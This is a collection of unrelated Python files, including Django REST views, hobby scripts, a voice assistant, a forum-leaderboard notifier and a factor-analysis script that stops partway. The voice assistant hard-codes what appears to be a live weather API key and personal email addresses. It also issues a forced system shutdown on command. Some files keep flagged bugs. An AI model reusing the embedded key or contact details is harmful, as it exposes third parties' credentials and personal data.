from rest_framework.response import Response
class UserViewSet(viewsets.ModelViewSet):
    """
    API endpoint that allows users to be viewed or edited.

    Users are listed newest-first (ordered by date_joined descending).
    """
    queryset = User.objects.all().order_by('-date_joined')
    serializer_class = UserSerializer
class GroupViewSet(viewsets.ModelViewSet):
    """
    API endpoint that allows groups to be viewed or edited.
    """
    queryset = Group.objects.all()
    serializer_class = GroupSerializer
class ProductViewSet(viewsets.ModelViewSet):
    """
    API endpoint that allows Products to be viewed or edited.

    When a request carries both `name` and `average_price`, the new
    average_price is propagated to every product sharing that name.
    """
    queryset = Product.objects.all()
    serializer_class = ProductSerializer

    def update(self, request, *args, **kwargs):
        # BUG FIX: dict.has_key() was removed in Python 3; `in` works on
        # both Python 2 and 3.
        if 'average_price' in request.data and 'name' in request.data:
            Product.objects.filter(name=request.data['name']).update(
                average_price=request.data['average_price'])
        partial = kwargs.pop('partial', False)
        instance = self.get_object()
        serializer = self.get_serializer(instance, data=request.data, partial=partial)
        serializer.is_valid(raise_exception=True)
        self.perform_update(serializer)
        return Response(serializer.data)

    def create(self, request, *args, **kwargs):
        # if products with this name already exist, refresh their
        # average_price before creating the new row
        if 'average_price' in request.data and 'name' in request.data:
            Product.objects.filter(name=request.data['name']).update(
                average_price=request.data['average_price'])
        serializer = self.get_serializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        self.perform_create(serializer)
        headers = self.get_success_headers(serializer.data)
        return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
class PurchaseViewSet(viewsets.ModelViewSet):
    """
    API endpoint that allows Purchases to be viewed or edited.
    """
    queryset = Purchase.objects.all()
    serializer_class = PurchaseSerializer
from django.db import models
# Create your models here.
class product(models.Model):
    """A catalogue item offered in the shop."""
    # BUG FIX: the field class was assigned without being instantiated
    # (`models.AutoField` instead of `models.AutoField(...)`), so Django
    # silently ignored it and auto-created an `id` column.  Making this
    # the explicit primary key requires a schema migration.
    product_id = models.AutoField(primary_key=True)
    product_name = models.CharField(max_length=100)
    category = models.CharField(max_length=100, default="")
    subcategory = models.CharField(max_length=100, default="")
    price = models.IntegerField(default=0)
    desc = models.CharField(max_length=300)
    pub_date = models.DateField()
    image = models.ImageField(upload_to='shop/images', default="")

    def __str__(self):
        return self.product_name
class Contact(models.Model):
    """A message submitted through the site's contact form."""
    msg_id = models.AutoField(primary_key=True)
    name = models.CharField(max_length=100)
    email = models.CharField(max_length=100, default="")
    phone = models.CharField(max_length=100, default="")
    desc = models.CharField(max_length=5000, default="")

    def __str__(self):
        return self.name
class Order(models.Model):
    """A customer order; purchased items are serialized into items_json."""
    order_id = models.AutoField(primary_key=True)
    items_json = models.CharField(max_length=5000)
    amount = models.IntegerField(default=0)
    name = models.CharField(max_length=100)
    email = models.CharField(max_length=100)
    address = models.CharField(max_length=500)
    city = models.CharField(max_length=100)
    state = models.CharField(max_length=100)
    zip_code = models.CharField(max_length=100)
    phone = models.CharField(max_length=100, default="")
class OrderUpdate(models.Model):
    """A status update attached to an order."""
    update_id = models.AutoField(primary_key=True)
    # BUG FIX: IntegerField had default="" (a string); use an integer.
    order_id = models.IntegerField(default=0)
    update_desc = models.CharField(max_length=5000)
    timestamp = models.DateField(auto_now_add=True)

    def __str__(self):
        # short preview of the update text
        return self.update_desc[0:7] + "..."
|
"""
@author: yyuuliang
project: https://github.com/yyuuliang/tf-api-example
Convert Autti's csv to gt.txt
"""
import os
import sys
import csv
def csv_txt():
    """Convert Autti's space-delimited train.csv into gt2.txt.

    Output line format: <frame>.jpg;<xmin>;<ymin>;<xmax>;<ymax>;<class_id>
    Frames are renumbered sequentially (zero-padded to 5 digits) in the
    order they first appear in the CSV.
    """
    labels = {'"car"': 1,
              '"truck"': 2,
              '"pedestrian"': 3,
              '"trafficLight"': 4,
              '"biker"': 5,
              }
    csv_fname = os.path.join('dataset/autti/train.csv')
    fidx = -1
    last_img_name = ''
    # context managers guarantee both files are closed even on error
    # (the original leaked gt2 if an exception occurred mid-loop)
    with open('dataset/autti/gt2.txt', 'w') as gt2, \
         open(csv_fname, 'r') as csvfile:
        spamreader = csv.reader(csvfile, delimiter=' ', quotechar='|', )
        for row in spamreader:
            img_name = row[0]
            # new source image -> advance the sequential frame index
            if last_img_name != img_name:
                last_img_name = img_name
                fidx = fidx + 1
            img_name_idx = str(fidx).zfill(5)
            xmin = int(row[1])
            ymin = int(row[2])
            xmax = int(row[3])
            ymax = int(row[4])
            class_name = row[6]
            class_id = labels[class_name]
            gtstr = '{}.jpg;{};{};{};{};{}\n'.format(img_name_idx,xmin,ymin,xmax,ymax,class_id)
            gt2.write(gtstr)
if __name__ == '__main__':
    csv_txt()
# David Powis-Dow CS 101:Python
# 2016-12-03 v0.1
# Chapter 4 : Exercise Turtle Functions
import turtle
def make_window(colr, ttle):
    """
    Set up the turtle window with the given background colour and title.
    Returns the new window.
    """
    screen = turtle.Screen()
    screen.bgcolor(colr)
    screen.title(ttle)
    return screen
def make_turtle(colr, pensz):
    """
    Create a turtle configured with the given colour and pen size.
    Returns the new turtle.
    """
    pen = turtle.Turtle()
    pen.color(colr)
    pen.pensize(pensz)
    return pen
def draw_poly(t, n, sz):
    """
    Draw a regular n-sided polygon with side length sz using turtle t.
    Returns t.
    """
    turn = 360 / n
    for _ in range(n):
        t.forward(sz)
        t.left(turn)
    return t
wn = make_window("azure", "Repeating Squares")
tess = make_turtle("hotpink", 5)
#sq_increment = 20 # Set the increment for increasing the size of the square
# NOTE(review): the title says "Squares" but an 8-sided polygon is drawn —
# confirm intent.
draw_poly(tess, 8, 50)
wn.mainloop()
#alex = make_turtle("black", 1)
#dave = make_turtle("yellow", 2)
|
from __future__ import print_function
import Pyro4
import bouncer
# you could set a comm timeout to avoid the deadlock situation...:
# Pyro4.config.COMMTIMEOUT = 2
# the daemon lives for the duration of the with-block
with Pyro4.Daemon() as daemon:
    uri = daemon.register(bouncer.Bouncer("Server"))
    # advertise the registered object in the Pyro name server
    Pyro4.locateNS().register("example.deadlock", uri)
    print("This bounce example will deadlock!")
    print("Read the source or Readme.txt for more info why this is the case!")
    print("Bouncer started.")
    # blocks, serving incoming calls until shut down
    daemon.requestLoop()
|
# What will the output of this be?
favouriteFood = ["apples","bananas"]
# Answer: My favourite food are: apples and bananas
print("My favourite food are: " + favouriteFood[0] + " and " + favouriteFood[1])
import pyttsx3
import datetime
import speech_recognition as sr
import wikipedia
import webbrowser
import os
import smtplib
import pyautogui
import psutil
import pyjokes
import requests
import json
def speak(audio):
    """Speak `audio` aloud via the module-level pyttsx3 engine (blocking)."""
    engine.say(audio)
    engine.runAndWait()
def wishMe():
    """Greet the user according to the current hour, then offer help."""
    hour = datetime.datetime.now().hour
    if 0 <= hour < 12:
        greeting = "Good Morning!"
    elif hour < 18:
        greeting = "Good Afternoon!"
    else:
        greeting = "Good Evening!"
    speak(greeting)
    speak("I am Jarvis,how may I help you")
def takeCommand():
    """
    Takes microphone input from the user and returns string output
    (the literal string "None" when recognition fails).
    """
    r = sr.Recognizer()
    with sr.Microphone() as source:
        print("Listening...")
        # seconds of silence that ends a phrase
        r.pause_threshold = 1
        audio = r.listen(source)
    try:
        print("Recognizing...")
        # Google's free recognizer with the Indian-English model
        query = r.recognize_google(audio, language = 'en-in')
        print(f"User said: {query}\n")
    except Exception as e:
        # recognition/network failure: ask the user to repeat
        print("Say that again please...")
        return "None"
    return query
def sendEmail(to,content):
    """Send `content` to address `to` through Gmail's SMTP server.

    SECURITY: credentials are hard-coded placeholders; move them to
    environment variables (or an app password) before real use.
    """
    server = smtplib.SMTP('smtp.gmail.com', 587)
    server.ehlo()
    # upgrade the connection to TLS before authenticating
    server.starttls()
    server.login('youremail@gmail.com', 'yourpassword')
    server.sendmail('youremail@gmail.com', to, content)
    server.close()
def takeSnap():
    """Capture the full screen and save it to a fixed path on the desktop."""
    img = pyautogui.screenshot()
    img.save("C:\\Users\\DIV CHAUDHARY\\Desktop\\Python\\a.png")
# module-level text-to-speech engine (SAPI5, Windows) used by speak();
# voices[0] selects the first installed system voice
engine = pyttsx3.init('sapi5')
voices = engine.getProperty('voices')
engine.setProperty('voice', voices[0].id)
def cpu():
    """Speak the current CPU utilisation and print battery status."""
    usage = str(psutil.cpu_percent())
    speak("CPU is at " + usage)
    battery = psutil.sensors_battery()
    print(battery)
def climate():
    """Ask for a city (typed, not spoken) and print its weather description."""
    speak("Please Enter the city name")
    city = input("City Name: ")
    # OpenWeatherMap current-weather endpoint; API key is embedded in the URL
    url = "http://api.openweathermap.org/data/2.5/weather?q={}&appid=fd42803ff8f720819345518a2c8ec0e8".format(city)
    res = requests.get(url)
    data = res.json()
    # NOTE(review): an unknown city raises KeyError here (response has no
    # 'weather' key) — confirm whether that is acceptable.
    desc = data['weather'][0]['description']
    print("Description: ",desc)
if __name__ == "__main__":
    wishMe()
    # main assistant loop: listen for a spoken command, then dispatch on
    # keyword matches; exits only via the 'go offline' command
    while(1):
        query = takeCommand().lower()
        #Logic for executing tasks based on query
        if 'wikipedia' in query:
            speak('Searching Wikipedia...')
            query = query.replace("wikipedia","")
            results = wikipedia.summary(query, sentences=2)
            speak("According to wikipedia")
            print(results)
            speak(results)
        elif 'open youtube' in query:
            webbrowser.open("www.youtube.com")
        elif 'open google' in query:
            webbrowser.open("www.google.com")
        elif 'open geeks for geeks' in query:
            webbrowser.open("www.geeksforgeeks.org")
        elif 'play music' in query:
            # plays the first file in the music directory
            music_dir = 'H:\\Music'
            songs = os.listdir(music_dir)
            os.startfile(os.path.join(music_dir,songs[0]))
        elif 'the time' in query:
            strTime = datetime.datetime.now().strftime("%H:%M:%S")
            speak(f"Sir, the time is {strTime}")
        elif 'open code' in query:
            codePath = "C:\\Users\\DIV CHAUDHARY\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"
            os.startfile(codePath)
        elif 'email to ajay' in query:
            try:
                speak("What is the message")
                content = takeCommand()
                to = "ajaymgc@yahoo.com"
                sendEmail(to, content)
                speak("Email has been sent")
            except Exception as e:
                speak("Sorry sir,I am unable to send this email currently.")
        elif 'remember that' in query:
            # persist a spoken note to data.txt (overwrites previous note)
            speak('What should I remember?')
            data = takeCommand()
            remember = open("data.txt", "w")
            remember.write(data)
            remember.close()
        elif 'remind me' in query:
            remember = open("data.txt", "r")
            speak("You said me to remember that" + remember.read())
            remember.close()
        elif 'take screenshot' in query:
            takeSnap()
            speak("Screenshot Taken")
        elif 'cpu' in query:
            cpu()
        elif 'weather' in query:
            climate()
        elif 'shutdown' in query:
            # Windows immediate power-off
            os.system('shutdown /p /f')
        elif 'go offline' in query:
            exit()
# Convert a length between imperial inches (in/英寸) and metric centimetres (cm/厘米).
# Prompts and outputs are in Chinese; 1 inch = 2.54 cm.
value=float(input('请输入长度:'))
unit=input('请输入单位:')
if unit=='in' or unit=='英寸':
    print('%f英寸=%f厘米'%(value,value*2.54))
elif unit=='cm'or unit=='厘米':
    print('%f厘米=%f英寸'%(value,value/2.54))
else:
    # unrecognized unit: ask for a valid one
    print('请输入有效的单位')
|
import math
import pygame
from coord_sys import CoordSys
from map import Map
def transform_pic(pic, width, height):
    """Return `pic` scaled to (width, height); dimensions truncated to ints."""
    target = (int(width), int(height))
    return pygame.transform.scale(pic, target)
class MapSprite(pygame.sprite.DirtySprite):
    """A named sprite whose image is produced lazily by a factory callable."""
    def __init__(self, get_image, name):
        pygame.sprite.DirtySprite.__init__(self)
        self.name = name
        # keep the factory so the image could be regenerated later
        self.get_image = get_image
        self.image = get_image()
        self.rect = self.image.get_rect()
    def draw(self, screen, pos):
        """Blit this sprite's image at `pos` on `screen`."""
        #screen.blit(self.image, [self.view_pos_x, self.view_pos_y, self.rect[2], self.rect[3]])
        screen.blit(self.image, pos)
"""
class Grass(MapSprite):
def __init__(self):
MapSprite.__init__(self, lambda: Grass_image, "Grass")
class Dirt(MapSprite):
def __init__(self):
MapSprite.__init__(self, lambda: Dirt_image, "Dirt")
class Water(MapSprite):
def __init__(self):
MapSprite.__init__(self, lambda: Water_image, "Water")
class Rock(MapSprite):
def __init__(self):
MapSprite.__init__(self, lambda: Rock_image, "Rock")
"""
class BlockMap:
    """Renders a Map as a square off-screen canvas of terrain tiles and
    blits a zoomed view of it onto the screen."""
    def __init__(self, map):
        # NOTE: parameter `map` shadows the builtin; kept for compatibility
        self.map = map
        self.load_pics()
    def load_pics(self):
        """Load terrain/decoration images (requires an initialised display)."""
        self.grass = pygame.image.load("images/Grass.jpg").convert()
        self.dirt = pygame.image.load("images/Dirt.jpg").convert()
        self.water = pygame.image.load("images/Water.jpg").convert()
        self.rock = pygame.image.load("images/Rock.jpg").convert()
        self.flowers = pygame.image.load("images/flowers.png").convert_alpha()
        self.tree = pygame.image.load("images/tree.png").convert_alpha()
    def resize_sprites(self, w, h):
        """Scale every tile image to w x h pixels."""
        self.grass_sprite = transform_pic(self.grass, w, h)
        self.dirt_sprite = transform_pic(self.dirt, w, h)
        self.water_sprite = transform_pic(self.water, w, h)
        self.rock_sprite = transform_pic(self.rock, w, h)
        # NOTE(review): tree/flowers are overwritten in place, so a second
        # resize rescales an already-scaled image — confirm intended.
        self.tree = transform_pic(self.tree, w, h)
        self.flowers = transform_pic(self.flowers, w, h)
    def get_sprites(self, row, col):
        """Return the scaled sprite for the map field at (row, col)."""
        field = self.map.get_field(row, col)
        if field == Map.GRASS: return self.grass_sprite
        if field == Map.WATER: return self.water_sprite
        if field == Map.DIRT: return self.dirt_sprite
        if field == Map.ROCK: return self.rock_sprite
        raise Exception('Unknown field type %d' % field)
    def create_canvas(self, width, height):
        """Render the whole map once onto an off-screen square canvas."""
        size = max(width, height)
        # tile pitch; tiles are rounded up so the canvas has no gaps
        delta = size / self.map.rows
        block_width = math.ceil(delta)
        block_height = math.ceil(delta)
        self.resize_sprites(block_width, block_height)
        self.coord_sys = CoordSys(pygame.Rect((0,0), (size, size)))
        self.canvas = pygame.Surface((size, size))
        y = 0
        for row in range(self.map.rows):
            x = 0
            for col in range(self.map.cols):
                sprite = self.get_sprites(row, col)
                self.canvas.blit(sprite, (x, y))
                x += delta
            y += delta
        #print("Final size: %s, %s" % (x, y))
    def update(self, width, height):
        """Re-zoom the cached canvas to the current viewport size."""
        width = int(width)
        height = int(height)
        size = max(width, height)
        self.coord_sys = CoordSys(pygame.Rect((0,0), (size, size)))
        self.zoom_canvas = pygame.transform.scale(self.canvas, (size, size))
        #print("Final size: %s, %s" % (x, y))
    def draw(self, screen, view_port):
        """Blit the visible part of the zoomed canvas onto `screen`."""
        screen.blit(self.zoom_canvas, (0, 0), area=view_port)
|
# Imports
from twilio.rest import Client
from sendgrid import SendGridAPIClient
from sendgrid.helpers.mail import *
import requests
import json
import os
# Global Setup
# TODO: Store those values in environment variables to retrieve them later (https://www.youtube.com/watch?v=5iWhQWVXosU)
# WEBHOOK_URL - Webhook URL for the Slack channel that you would like to post to
# ENDPOINT - URL of the endpoint that you're hitting executing your Data Explorer query
# API_KEY - Key that you can generate in API section in your Discourse Dashboard
# ACCOUNT_SID - Parameter that you can grab by logging into your Twilio Console (https://www.youtube.com/watch?v=knxlmCVFAZI)
# AUTH_TOKEN - Authentication token that you can grab from Twilio Console as well
# FROM_NUMBER - Your Twilio phone number that you will be sending the SMS from. Grab it from Twilio Console
# TO_NUMBER - Phone number that you will be sending the SMS to
# SENDGRID_KEY - Your API KEY that you can use to develop solutions using SendGrid services (https://www.youtube.com/watch?v=xCCYmOeubRE&t=19s)
# API_USERNAME - Put system if yoy created the API Key for all users otherwise put in your Discourse username
# Configuration is read from environment variables (documented above);
# missing variables raise KeyError at import time, which fails fast.
WEBHOOK_URL = os.environ['LEADERBOARD_WEBHOOK_URL']
ENDPOINT = os.environ['LEADERBOARD_ENDPOINT']
API_KEY = os.environ['LEADERBOARD_API_KEY']
ACCOUNT_SID = os.environ['TWILIO_ACCOUNT_SID']
AUTH_TOKEN = os.environ['TWILIO_AUTH_TOKEN']
FROM_NUMBER = os.environ['TWILIO_LEADERBOARD_FROM_NUMBER']
TO_NUMBER = os.environ['TWILIO_LEADERBOARD_TO_NUMBER']
SENDGRID_KEY = os.environ['SENDGRID_KEY']
API_USERNAME = 'system'
# shared Twilio client used by the SMS helper below
twilio_client = Client(ACCOUNT_SID, AUTH_TOKEN)
# Core Functions
def fetch_leaderboard():
    """Run the Discourse Data Explorer query and return the results.

    Returns a tuple: (formatted leaderboard text, list of (email, name)
    tuples for the top three contributors).
    """
    headers = {'Content-Type': 'multipart/form-data', 'Api-Key': API_KEY, 'Api-Username': API_USERNAME}
    request = requests.post(url = ENDPOINT, headers = headers)
    print("Request Status Code: {}".format(request.status_code))
    # Unprocessed API request response
    response = json.loads(request.text)
    # Processed API request response - now it's parsed into a dictionary
    # TODO: Based on your query you will need to adjust the syntax below to access the dictionary element of your choice
    # NOTE(review): the column positions (1=name, 2=email, 6=points) are
    # specific to the Data Explorer query in use — verify against its output.
    response_rows = response["rows"]
    first_place = {'Name': response_rows[0][1],
                   'Email': response_rows[0][2],
                   'Total_Points': response_rows[0][6]}
    second_place = {'Name': response_rows[1][1],
                    'Email': response_rows[1][2],
                    'Total_Points': response_rows[1][6]}
    third_place = {'Name': response_rows[2][1],
                   'Email': response_rows[2][2],
                   'Total_Points': response_rows[2][6]}
    winners_names_emails = [(first_place['Email'], first_place['Name']), (second_place['Email'], second_place['Name']),
                            (third_place['Email'], third_place['Name'])]
    response_text = "Community Leaderboard 🏆\n🥇 {} ({}) - {} pts\n🥈 {} ({}) - {} pts\n🥉 {} ({}) - {} pts".format(first_place['Name'], first_place['Email'], first_place['Total_Points'], second_place['Name'], second_place['Email'], second_place['Total_Points'], third_place['Name'], third_place['Email'], third_place['Total_Points'])
    # Output Form
    # Community Leaderboard 🏆
    # 🥇 John Doe (john.doe@gmail.com) - 51 pts
    # 🥈 Caroline Doe (caroline@yahoo.com) - 34 pts
    # 🥉 John Keller (johnkeller@gmail.com) - 12 pts
    return response_text, winners_names_emails
def post_to_slack(leaderboard):
    """Post the leaderboard text to the configured Slack webhook."""
    payload = json.dumps({'text': leaderboard})
    requests.post(WEBHOOK_URL, payload)
def send_leaderboard_via_sms_to_prize_sender(leaderboard):
    """Text the leaderboard to the prize sender via the shared Twilio client."""
    twilio_client.messages.create(
        body=leaderboard,
        from_=FROM_NUMBER,
        to=TO_NUMBER)
def notify_top_contributors_via_email(leaderboard, winners_emails):
    """Email congratulations (including the leaderboard) to the top three.

    `winners_emails` is the list of (email, name) tuples produced by
    fetch_leaderboard(); is_multiple=True sends each recipient their own copy.
    """
    # Whether if you want to hide your from email or not you can also store it in environment variables
    # TODO: Fill in from_email and adjust subject + html_content / plain_content based on your needs
    message = Mail(
        from_email = ('konrad.sopala@auth0.com', 'Konrad Sopala'),
        subject = 'Auth0 Community - Leaderboard 🏆',
        html_content = '',
        plain_text_content = 'Congrats for your efforts last month! We really appreciate it! You have been one of Top 3 performers in our community forum. Someone from Auth0 will contact you shortly to send you some secret SWAG\n{}'.format(leaderboard),
        to_emails = winners_emails,
        is_multiple = True)
    # Email Form
    # Congrats for your efforts last month! We really appreciate it! You have been one of Top 3 performers in our community forum.
    # Someone from Auth0 will contact you shortly to send you some secret SWAG!
    # Community Leaderboard 🏆
    # 🥇 John Doe (john.doe@gmail.com) - 51 pts
    # 🥈 Caroline Doe (caroline@yahoo.com) - 34 pts
    # 🥉 John Keller (johnkeller@gmail.com) - 12 pts
    sendgrid_client = SendGridAPIClient(SENDGRID_KEY)
    response = sendgrid_client.send(message)
    print(response.status_code)
# fetch once, then fan out: Slack post, SMS to the prize sender, and
# congratulation emails to the winners
processed_leaderboard = fetch_leaderboard()
post_to_slack(processed_leaderboard[0])
send_leaderboard_via_sms_to_prize_sender(processed_leaderboard[0])
notify_top_contributors_via_email(processed_leaderboard[0], processed_leaderboard[1])
|
from collections import Counter
# Adding two Counters merges them, summing the values of shared keys:
# here the result holds {'1': 400, '2': 400, '3': 470}.
dict1 = {'1': 100, '2': 200, '3':70}
dict2 = {'1': 300, '2': 200, '3':400}
d = Counter(dict1) + Counter(dict2)
print(d)
|
import tensorflow as tf
import numpy as np
import argparse
from artistic_style import imread
from artistic_style import imsave
from artistic_style import transfer_style
def parse_args():
    """Parse CLI arguments: positional content image, required -o and -m."""
    parser = argparse.ArgumentParser()
    parser.add_argument('content', help='image to be transformed')
    parser.add_argument('-o', '--output', required=True,
                        help='output file')
    parser.add_argument('-m', '--model', required=True,
                        help='pretrained model')
    return parser.parse_args()
def main():
    """CLI entry: stylize the content image with the pretrained model."""
    args = parse_args()
    # load -> transfer -> save
    content = imread(args.content)
    styled = transfer_style(content, args.model)
    imsave(args.output, styled)
if __name__ == '__main__':
    main()
|
#import libraries
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import linear_model
# load the training dataset (single-feature linear regression data)
data=pd.read_csv("C:\\Users\\54721\\OneDrive\\Desktop\\kagle dataset\\linear regression dataset\\train.csv")
# quick look at the dataset
print(data)
# (rows, columns) of the DataFrame
print(data.shape)
#data.plot(kind='scatter',x="x",y="y")
# plt.show()
#data.plot(kind='box')
# plt.show()
# correlation coefficients
#print(data.corr())
# wrap each column as its own single-column DataFrame
X_axis=pd.DataFrame(data['x'])
print(X_axis)
Y_axis=pd.DataFrame(data['y'])
print(Y_axis)
# fit an ordinary least-squares linear regression model
lm = linear_model.LinearRegression()
model = lm.fit(X_axis,Y_axis)
print(model.predict(X_axis))
print(model.coef_)
print(model.intercept_)
# R^2 score of the fit on the training data
print(model.score(X_axis,Y_axis))
# predict y for a single new x value
X_axis_new = [[24]]
Y_axis_predict = model.predict(X_axis_new)
print(Y_axis_predict)
# predict several more values
a= [6,78,91]
a=pd.DataFrame(a)
print(a)
# rename the column from 0 to 'x'; otherwise a KeyError occurs when plotting
a.columns = ['x']
print(a)
b=model.predict(a)
print(b)
df=pd.DataFrame(b)
print(df)
# scatter plot of the raw data
data.plot(kind='scatter',x= 'x' ,y='y')
# regression line over the training range
plt.plot(X_axis,model.predict(X_axis),color='red',linewidth=2)
# predicted value for X_axis_new = [[24]]
plt.scatter(X_axis_new,Y_axis_predict,color='yellow')
# predicted values for the sample a = [6, 78, 91]
plt.scatter(a,b,color='green',linewidth=3)
# blue line connecting the predictions for sample a
plt.plot(a,b,color='blue',linewidth=3)
# display the combined figure
plt.show()
|
#!/usr/bin/env python3
# SlicingExample.py - prompt user for a URL and then extract
# the domain name for that input
# input should be in the form --> http://www.somethinghere.com
# BUG FIX: corrected the typo "compete" -> "complete" in the user prompt.
url = input('Please enter the complete URL (http://www.xyz.com): ')
# NOTE: the slice assumes exactly the 11-character 'http://www.' prefix and
# a 4-character suffix such as '.com'; other URL shapes will be mangled.
domain = url[11:-4]
print(domain)
|
import numpy as np
import sys
from matplotlib import pyplot as plt
def read():
    """Load rtsim.dat and return the magnitude traces (cav, fwd, rfl).

    Columns are interleaved real/imaginary pairs for the cavity, forward
    and reflected signals.
    """
    raw = np.loadtxt('rtsim.dat')
    cav, fwd, rfl = (abs(raw[:, 2 * i] + 1j * raw[:, 2 * i + 1])
                     for i in range(3))
    return cav, fwd, rfl
def show(data):
    """Plot the three magnitude traces with a legend."""
    cav, fwd, rfl = data
    for trace, label in ((cav, 'cav'), (fwd, 'fwd'), (rfl, 'rfl')):
        plt.plot(trace, label=label)
    plt.legend()
    plt.show()
def fail_pass(condition):
    """Print PASS/FAIL for `condition`; exit with status 1 on failure."""
    if condition:
        print('PASS')
        return
    print('FAIL')
    sys.exit(1)
def check_err(test_val, bound, err):
    """Return True when *test_val* lies within *err* of *bound* (logs the comparison)."""
    within = abs(test_val - bound) < err
    print(test_val, bound, err, within)
    return within
def make_check(data):
    """Check the final sample of each trace against its expected value.

    Delegates to fail_pass, which exits with status 1 on a failure; the
    generator keeps the original short-circuit (a failed trace skips the
    remaining comparisons).
    """
    cav, fwd, rfl = data
    tolerance = 10
    expectations = ((cav, 8739), (fwd, 6714), (rfl, 6022))
    fail_pass(all(check_err(trace[-1], target, tolerance)
                  for trace, target in expectations))
if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description='rtsim')
    # NOTE: with default=True this flag is a no-op (store_true on an
    # already-True default); kept only for CLI backward compatibility.
    parser.add_argument('-c', '--check', action='store_true', default=True,
                        help='Purely run the check')
    parser.add_argument('-s', '--show', action='store_true',
                        help='Show plots')
    args = parser.parse_args()
    data = read()
    # The check always runs; plotting is opt-in.  This collapses the
    # original if/else, whose two branches both called make_check.  Order
    # is preserved: make_check may sys.exit(1) before any plot appears.
    make_check(data)
    if args.show:
        show(data)
|
class player:
    """A player with a name, a grade, and a club-membership flag."""

    def __init__(self, name, grade, isMember = False):
        # Store the constructor arguments verbatim.
        self.name = name
        self.grade = grade
        self.isMember = isMember

    def getGrade(self):
        """Return the player's grade."""
        return self.grade

    def getName(self):
        """Return the player's name."""
        return self.name

    def getIsMember(self):
        """Return True when the player is a club member."""
        return self.isMember
|
#
# @lc app=leetcode id=268 lang=python3
#
# [268] Missing Number
#
from typing import List
# @lc code=start
class Solution:
    '''O(n log n) via sorting: after sorting, the first index whose value
    differs from it is the missing number; if none differs, n is missing.
    '''
    def missingNumber(self, nums: List[int]) -> int:
        nums.sort()
        for idx, val in enumerate(nums):
            if idx != val:
                return idx
        return len(nums)
class Solution:
    '''O(n) time
    let the index equals the element, i.e., nums[i] == i

    Cyclic-placement approach: drop each value at the index equal to
    itself, then the first index whose value differs is the missing one.
    NOTE(review): assumes nums is non-empty (max() raises on []) and
    mutates nums in place (sorted + one appended duplicate of n) --
    confirm callers accept both.
    '''
    def missingNumber(self, nums: List[int]) -> int:
        # step 1: see if elelment n is there
        n = len(nums)
        if max(nums) != n:
            return n
        nums.append(n) # n already exist, adding another n in the end doesn't affect
        # step 1: let nums[i] == i
        for i in range(n):
            cur = i
            if nums[cur] != cur:
                # Place nums[cur] at its home index, then keep following
                # the chain of displaced values until it closes.
                prev = nums[nums[cur]]
                nums[nums[cur]] = nums[cur]
                while nums[prev] != prev:
                    new_prev = nums[prev]
                    nums[prev] = prev
                    prev = new_prev
        # step 2: find the missing one
        # NOTE(review): falls through to an implicit None if every index
        # matches -- presumably unreachable after the duplicate append,
        # but unverified.
        for i in range(len(nums)):
            if i != nums[i]:
                return i
class Solution:
    '''Arithmetic (Gauss) approach: the sum 0 + 1 + ... + n minus the
    actual sum of nums is exactly the missing element.
    '''
    def missingNumber(self, nums: List[int]) -> int:
        n = len(nums)
        return n * (n + 1) // 2 - sum(nums)
# Demo run.  Because all three classes above share the name ``Solution``,
# only the last definition (the arithmetic one) is exercised here.
nums = [9,6,4,2,3,5,7,0,1]
# nums = [3, 0, 1]
s = Solution()
print(s.missingNumber(nums))
# @lc code=end
|
import math
import numpy
import matplotlib
# Demonstrate a few operations on math.pi (output labels are in Spanish).
valorPI = math.pi
print("Squared:",valorPI**2)   # pi squared
print("Doble: ",valorPI*2)     # "Doble" = double, i.e. 2*pi
print("Valor de pi: ",valorPI) # the raw value of pi
|
import pandas as pd
import numpy as np
import settings
# Factor analysis of the task-15 table: standardize, sphericity test,
# factor extraction, rotation search, and factor scores.
df = settings.task_15_table
# Standardize each column (sample standard deviation, ddof=1).
df_st = (df - df.mean()) / df.std(ddof=1)
print(df_st)
n = len(df)
m = p = len(df.columns)
XH = df_st.values
R = df.corr().values
print("R")
print(R)
# Bartlett-style sphericity statistic, compared against a chi-square
# critical value.
chi_st = -(n - (2 * p + 5) / 6) * np.log(np.abs(np.linalg.det(R)))
print()
print("chi_st", chi_st, ">? 18.307")
R_1 = np.linalg.inv(R)
# Communalities estimated from the diagonal of the inverse correlation matrix.
h2 = 1 - 1 / np.diag(R_1)
print("h2\n", h2)
Rh = R.copy()
np.fill_diagonal(Rh, h2)
print("Rh\n", Rh)
alpha, eigvec = np.linalg.eig(R)
# NOTE(review): zip(alpha, eigvec) pairs each eigenvalue with a ROW of
# eigvec, but np.linalg.eig returns eigenvectors as the COLUMNS of its
# second output -- this sort therefore reorders rows, not eigenvectors.
# Verify against the intended algorithm.
alpha, eigvec = np.array(sorted(zip(alpha, eigvec), key=lambda x: x[0], reverse=True)).T
print("Eigenvalues, Eigenvectors")
eigvec = np.stack(eigvec)
print(alpha)
print(eigvec)
# Number of retained factors (Kaiser criterion left commented out).
r = 3 # len(list(filter(lambda x: x > 1, alpha)))
print("r =", r)
V = np.array(eigvec[:r])
# Loadings: retained vectors scaled by the square roots of their eigenvalues.
A = V.T.dot(np.diag(alpha[:r] ** 0.5))
print("A\n", np.round(A.astype(float), 2))
chi_st = (n - (2 * m + 5) / 6 - 2 * r / 3) * np.log(
    np.linalg.det(A.T.dot(A).astype(float)) / np.linalg.det(R)
)
print(chi_st, ">? 11.34")
# Grid search over rotation angles (5..90 deg, step 5) maximizing q.
qval = {}
for i in range(5, 91, 5):
    # NOTE(review): the 1 in the top-right corner of T12 looks like a typo
    # (a pure rotation matrix would have 0 there) -- confirm.
    T12 = np.array(
        [
            [np.cos(np.deg2rad(i)), np.sin(np.deg2rad(i)), 1],
            [-np.sin(np.deg2rad(i)), np.cos(np.deg2rad(i)), 0],
            [0, 0, 1,],
        ]
    )
    T13 = np.array(
        [
            [np.cos(np.deg2rad(i)), 0, np.sin(np.deg2rad(i))],
            [0, 1, 0,],
            [-np.sin(np.deg2rad(i)), 0, np.cos(np.deg2rad(i))],
        ]
    )
    T23 = np.array(
        [
            [1, 0, 0,],
            [0, np.cos(np.deg2rad(i)), np.sin(np.deg2rad(i))],
            [0, -np.sin(np.deg2rad(i)), np.cos(np.deg2rad(i))],
        ]
    )
    T = T12.dot(T13).dot(T23)
    Ah = A.dot(T)
    q = np.sum((np.sum(Ah ** 4, axis=1) - np.sum(Ah ** 2, axis=1) ** 2) / (r ** 2))
    # print(i, q)
